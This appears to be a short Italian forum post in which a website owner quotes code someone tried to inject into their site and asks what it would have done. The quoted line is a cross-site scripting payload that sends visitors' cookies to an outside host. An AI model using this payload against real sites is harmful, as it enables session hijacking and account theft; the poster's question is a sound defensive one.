Nel mio sito un tipo ha tentato di inserire questo codice, sono riuscito ad intercettare e modificare il testo ma cosa avrebbe fatto?

<script>document.location="http://predator_166.php0h.com/grab/grab.php?cookie="+escape(document.cookie)</script>